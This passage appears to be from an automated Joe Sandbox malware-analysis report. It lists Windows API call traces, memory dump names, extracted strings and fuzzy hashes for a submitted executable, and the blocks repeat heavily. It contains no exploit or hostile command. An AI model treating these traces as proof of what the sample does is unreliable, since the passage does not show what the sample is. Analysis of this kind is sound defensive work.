                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E51F
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: bffb5bc56fcfbbfe2735e91b56e4b96c9b59f85bc011faa0683f115e7312f41a
                                                                                                                    • Instruction ID: b269582b6b8d0abde51de6825fd23f3c0fe0828cc96572e8c5336aad0e1491d2
                                                                                                                    • Opcode Fuzzy Hash: bffb5bc56fcfbbfe2735e91b56e4b96c9b59f85bc011faa0683f115e7312f41a
                                                                                                                    • Instruction Fuzzy Hash: 52A011E2AA8882BC300C2220AC02C3F020CC3C2F22330882EFC8A88082BC800E080830
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E580
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: b21b90e87df309248278b5524e00649cdd65c9bc42a20804cd07feb925d31864
                                                                                                                    • Instruction ID: 85f75f05974cc2932cf69e8af298a8556a5417ce5618011fc45ddefd24224cfa
                                                                                                                    • Opcode Fuzzy Hash: b21b90e87df309248278b5524e00649cdd65c9bc42a20804cd07feb925d31864
                                                                                                                    • Instruction Fuzzy Hash: 76A011E2AA82803C300C22A0AC02C3B020CC3C0B23330822EFC8888082BC802A080830
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E580
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: c94722a033d787aa2c9c7ea78c7256d44a8d81755f6e19b5bdcc3da9595895fb
                                                                                                                    • Instruction ID: a6b720a287ae158935b4a082dfe2bedc4a3e0fe4fafa9c78c17b87a2ae388039
                                                                                                                    • Opcode Fuzzy Hash: c94722a033d787aa2c9c7ea78c7256d44a8d81755f6e19b5bdcc3da9595895fb
                                                                                                                    • Instruction Fuzzy Hash: C6A012D15581817C300C11509C02C3B020CC3C0B52330841EFC49840817C4019080430
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E580
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: f3b9470996a5ceb6ccfa884fa06b7dfc2c777ad6658606a7beb2055b170b4287
                                                                                                                    • Instruction ID: a6b720a287ae158935b4a082dfe2bedc4a3e0fe4fafa9c78c17b87a2ae388039
                                                                                                                    • Opcode Fuzzy Hash: f3b9470996a5ceb6ccfa884fa06b7dfc2c777ad6658606a7beb2055b170b4287
                                                                                                                    • Instruction Fuzzy Hash: C6A012D15581817C300C11509C02C3B020CC3C0B52330841EFC49840817C4019080430
                                                                                                                    APIs
                                                                                                                    • SetEndOfFile.KERNELBASE(?,0004903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00049F0C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 749574446-0
                                                                                                                    • Opcode ID: 63108d111e31055d053bb1f313084d23de7a65bfb7009b5d9cbed2f1645db8b1
                                                                                                                    • Instruction ID: 61417b74da2b8a4ae9492ee6e51e8e6c11e8b1e4652ceb8ad676b10dc8ef40ad
                                                                                                                    • Opcode Fuzzy Hash: 63108d111e31055d053bb1f313084d23de7a65bfb7009b5d9cbed2f1645db8b1
                                                                                                                    • Instruction Fuzzy Hash: 46A0123044000946AD001730C91440C3710F7107C03000194500ACA061C71A44579A01
                                                                                                                    APIs
                                                                                                                    • SetCurrentDirectoryW.KERNELBASE(?,0005AE72,C:\Users\user\Desktop,00000000,0008946A,00000006), ref: 0005AC08
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentDirectory
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1611563598-0
                                                                                                                    • Opcode ID: fdd20c21fdb2f110836bb838ca6940edcb05459cf5d0747a2906e4bdd818bc92
                                                                                                                    • Instruction ID: 6b542b18e9aa633a4ee653658ca2603a13d7796c54a319aa68fe9872174276d3
                                                                                                                    • Opcode Fuzzy Hash: fdd20c21fdb2f110836bb838ca6940edcb05459cf5d0747a2906e4bdd818bc92
                                                                                                                    • Instruction Fuzzy Hash: 1FA011302002008BA2000B328F0AA0EBBAAAFA2B00F00C028A08880030CB38C8A0FA00
                                                                                                                    APIs
                                                                                                                    • CloseHandle.KERNELBASE(000000FF,?,?,000495D6,?,?,?,?,?,00072641,000000FF), ref: 0004963B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseHandle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2962429428-0
                                                                                                                    • Opcode ID: 9d646d080c1ce1b39bac804990db83384b094fe5bba7e5262741df26dc95f690
                                                                                                                    • Instruction ID: e6637fa418fb50dd4584938c0158d192330d8263de92044dec658e3b550f26a4
                                                                                                                    • Opcode Fuzzy Hash: 9d646d080c1ce1b39bac804990db83384b094fe5bba7e5262741df26dc95f690
                                                                                                                    • Instruction Fuzzy Hash: 87F082B0481B159FEB308A24C858B93B7E8AB12321F045B3ED0E6429E0D765698D9B48
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00041316: GetDlgItem.USER32(00000000,00003021), ref: 0004135A
                                                                                                                      • Part of subcall function 00041316: SetWindowTextW.USER32(00000000,000735F4), ref: 00041370
                                                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0005C2B1
                                                                                                                    • EndDialog.USER32(?,00000006), ref: 0005C2C4
                                                                                                                    • GetDlgItem.USER32(?,0000006C), ref: 0005C2E0
                                                                                                                    • SetFocus.USER32(00000000), ref: 0005C2E7
                                                                                                                    • SetDlgItemTextW.USER32(?,00000065,?), ref: 0005C321
                                                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0005C358
                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0005C36E
                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0005C38C
                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0005C39C
                                                                                                                    • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0005C3B8
                                                                                                                    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0005C3D4
                                                                                                                    • _swprintf.LIBCMT ref: 0005C404
                                                                                                                      • Part of subcall function 00044092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000440A5
                                                                                                                    • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0005C417
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0005C41E
                                                                                                                    • _swprintf.LIBCMT ref: 0005C477
                                                                                                                    • SetDlgItemTextW.USER32(?,00000068,?), ref: 0005C48A
                                                                                                                    • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0005C4A7
                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0005C4C7
                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0005C4D7
                                                                                                                    • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0005C4F1
                                                                                                                    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0005C509
                                                                                                                    • _swprintf.LIBCMT ref: 0005C535
                                                                                                                    • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0005C548
                                                                                                                    • _swprintf.LIBCMT ref: 0005C59C
                                                                                                                    • SetDlgItemTextW.USER32(?,00000069,?), ref: 0005C5AF
                                                                                                                      • Part of subcall function 0005AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0005AF35
                                                                                                                      • Part of subcall function 0005AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,0007E72C,?,?), ref: 0005AF84
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                                                                    • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                                                                                    • API String ID: 797121971-1840816070
                                                                                                                    • Opcode ID: ea88084fd830c66efad2c266b43cd14c48f521a244789eac5ff1169baac72111
                                                                                                                    • Instruction ID: 22ab3d6c2d6c51de24571f7fdbcb9495f674ec4cf44beb5d0de13da9d7d25163
                                                                                                                    • Opcode Fuzzy Hash: ea88084fd830c66efad2c266b43cd14c48f521a244789eac5ff1169baac72111
                                                                                                                    • Instruction Fuzzy Hash: AF9174B2548344BFF2219BA0CC49FFB77ECEB4A701F444819BA49D6081D779AA498762
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00046FAA
                                                                                                                    • _wcslen.LIBCMT ref: 00047013
                                                                                                                    • _wcslen.LIBCMT ref: 00047084
                                                                                                                      • Part of subcall function 00047A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00047AAB
                                                                                                                      • Part of subcall function 00047A9C: GetLastError.KERNEL32 ref: 00047AF1
                                                                                                                      • Part of subcall function 00047A9C: CloseHandle.KERNEL32(?), ref: 00047B00
                                                                                                                      • Part of subcall function 0004A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,0004977F,?,?,000495CF,?,?,?,?,?,00072641,000000FF), ref: 0004A1F1
                                                                                                                      • Part of subcall function 0004A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0004977F,?,?,000495CF,?,?,?,?,?,00072641), ref: 0004A21F
                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00047139
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00047155
                                                                                                                    • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00047298
                                                                                                                      • Part of subcall function 00049DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,000473BC,?,?,?,00000000), ref: 00049DBC
                                                                                                                      • Part of subcall function 00049DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00049E70
                                                                                                                      • Part of subcall function 00049620: CloseHandle.KERNELBASE(000000FF,?,?,000495D6,?,?,?,?,?,00072641,000000FF), ref: 0004963B
                                                                                                                      • Part of subcall function 0004A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0004A325,?,?,?,0004A175,?,00000001,00000000,?,?), ref: 0004A501
                                                                                                                      • Part of subcall function 0004A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0004A325,?,?,?,0004A175,?,00000001,00000000,?,?), ref: 0004A532
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                                                                                                    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                    • API String ID: 3983180755-3508440684
                                                                                                                    • Opcode ID: 4e5dd1bf840c2f56e483679b64c1541bbe3cba8615e4901b4036229cd9450375
                                                                                                                    • Instruction ID: 8d11d045f938c2c73c173ee09c6ee4ccf5f8df747b02d97e601be9624d157968
                                                                                                                    • Opcode Fuzzy Hash: 4e5dd1bf840c2f56e483679b64c1541bbe3cba8615e4901b4036229cd9450375
                                                                                                                    • Instruction Fuzzy Hash: 63C1B3F1D04644AAEB25EF74CC85FEFB7A8AF04300F004569F95AE7183D774AA848B65
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __floor_pentium4
                                                                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                    • API String ID: 4168288129-2761157908
                                                                                                                    • Opcode ID: 3963cb21979060a29af17e64431df566c7b50b56b09c88a495a9662bd0908793
                                                                                                                    • Instruction ID: cd05f993aa19eb317acf45225147d927a48c53f1375dfb1158e3f59259db3182
                                                                                                                    • Opcode Fuzzy Hash: 3963cb21979060a29af17e64431df566c7b50b56b09c88a495a9662bd0908793
                                                                                                                    • Instruction Fuzzy Hash: 4EC24775E086688FDB65CE28DD447EAB7F6EB44304F1441EAD80EE7241E779AE818F40
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
